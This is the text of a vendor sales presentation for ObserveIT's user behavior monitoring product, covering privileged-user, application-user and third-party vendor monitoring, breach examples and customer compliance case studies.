User Behavior Monitoring
advertisement
USER BEHAVIOR MONITORING: KNOW WHEN USERS PUT YOUR BUSINESS AT RISK Presented by Matt Zanderigo WHO IS OBSERVEIT? The leading provider of User Behavior Monitoring for Application Users, Admins and External Vendors HQ Boston, MA / R&D Tel Aviv, Israel Founded 2006 1,200+ Customers Worldwide $20M Invested by Bain Capital APPLICATION ACCESS App Users App Admins PRIVILEGED ACCESS Shared Accounts Named Accounts (Windows Admins, root, DBAs, System Admins,…) (Developers, IT Contractors, Network Admin,…) APPLICATION ACCESS: THE WINDOW TO OUR MOST SENSITIVE DATA AT&T will pay $25 million after callcenter workers sold customer data Ex-JPMorgan Employee Charged With Stealing Customer Data Morgan Stanley insider exposes rich clients' info online APP BLIND SPOTS = DATA EXPOSURE SHIFT FOCUS FROM POSSIBLE ACTIONS TO ACTUAL USAGE App Entitlement changes Logging App Utilization _____________________________________________________ _____________________________________________________ Adding Users Deleting Accounts Modifying Access Customer data Financial records Account Information Get deep insight within applications Challenge: Get visibility within 20 financial apps Needed to comply with FDIC requirements surrounding the audit and logging of privileged access to applications. Ongoing challenge for over two years, because some of the legacy and web based applications do not have their own internal logging and audit reports that meet FDIC regulations. Solution: Holistic view of application utilization by administrator level users Real-time alerts for creation, modification, or deletion of users Reports centered around application access as a whole PRIVILEGED ACCESS: THE ROOT OF TODAY’S BIGGEST BREACHES 56M affected –by Home Depot Breach, Privilege Escalation to Blame 78.8M affected by Anthem breach, DBA account compromised Sony Attackers Used Stolen Admin Credentials SUPER USER OR SUPER THREAT? SHIFT FOCUS FROM SESSION RECORDING TO USER ANALYTICS Configuration changes _____________________________________________________ Embedded Scripts Unsecure ‘shell’ Unauthorized access Unapproved ‘setuid’ Escalated privileges _____________________________________________________ Lateral Movement ‘rm’ ‘cp’ with ‘sudo’ Creating “backdoors” ‘leapfrog’ logins Get deep insight within sessions Get visibility within sessions on 160 PCI/SOX Systems Challenge: The Board of Directors of Ally Bank established a Privileged User Access (PUA) project for all sessions that are accessing data on servers in-scope for PCI and SOX compliance. Their 5,000 privileged users represented a significant risk in their organization, so they are rolling out Password vaulting (Lieberman) and needed to implement a monitoring program in parallel Solution: Needed a monitoring system to collect, alert, and report on the specific use of applications, functions, or access to specific information WHAT YOU NEED TO MONITOR Privileged Users Application Users __________________________________________ __________________________________________ External Vendors __________________________________________ Healthcare (PHI) data Customer (PII) data Employee data Company data Financial data Intellectual property Sales & marketing data Audit and Compliance EU Data Protection Reform SOX HIPAA PRIVILEGED USER MONITORING PRIVILEGED IDENTITY MANAGEMENT Provisioning & Governance _____________________________________________________ User Monitoring _____________________________________________________ Visual Audit Trail of all privileged user sessions App & Access usage Reporting Detailed session analysis: sudo, privileged escalation, backdoors… Password Vaults _____________________________________________________ CUSTOMER EXAMPLES PCI Vendor Privileged Access Privileged User Monitoring for HIPAA Monitoring internal and credit card vendors with access to PCI systems Monitoring privileged users with access to over 1,350 servers to protect PHI Detect unauthorized configuration changes Meeting internal and external audit Auditing 1,700 business users who access applications including PeopleSoft, Microsoft Lync and home grown tools Real-time monitoring of unauthorized account creation and firewall changes RD 3 PARTY VENDOR MONITORING 3RD PARTY VENDOR COMPLIANCE Controlled Access _____________________________________________________ User Monitoring _____________________________________________________ Identify and Monitor thirdparty access Remote access user activity monitoring Alert on unauthorized access to Sensitive systems Incident response including session replay from log events HIPAA, PCI, NERC, FFIEC, SOX, FISMA, FERPA Change Management _____________________________________________________ CUSTOMER EXAMPLES Remove Vendor Access to ERP Audit third-party ERP solution provider Monitor internal IT administrators activities Deter negligent third-party activities Monitoring Private Cloud Contractors Global project to consolidate 140 data center to 6; provide private cloud to all Allianz subsidiaries Needed to meet strict German data protection laws to keep project on track Monitors over 300 IBM contractors Expanding coverage to all contractors and privileged users APPLICATION USER MONITORING INSIDER THREATS Critical Applications At Risk Employees _____________________________________________________ _____________________________________________________ Remote Workers Employee Turnover Layoffs Two weeks notice HR watch list Shadow IT _____________________________________________________ CUSTOMER EXAMPLES EHR System (EPIC) & PHI Servers If an employee views the patient record of another hospital employee If a doctor, nurse, pharmacist, etc. views the record of a patient not under their care If a doctor, nurse, pharmacist, etc. views the record of a high profile patient (VIP) Privileged users with access to PHI data storage infrastructure Policy Quoting & Claims Handling App data extraction (exporting reports, large copy operations) Unnecessarily accessing sensitive files (view/open/save/export) Business claims employees viewing personal claims information THANK YOU
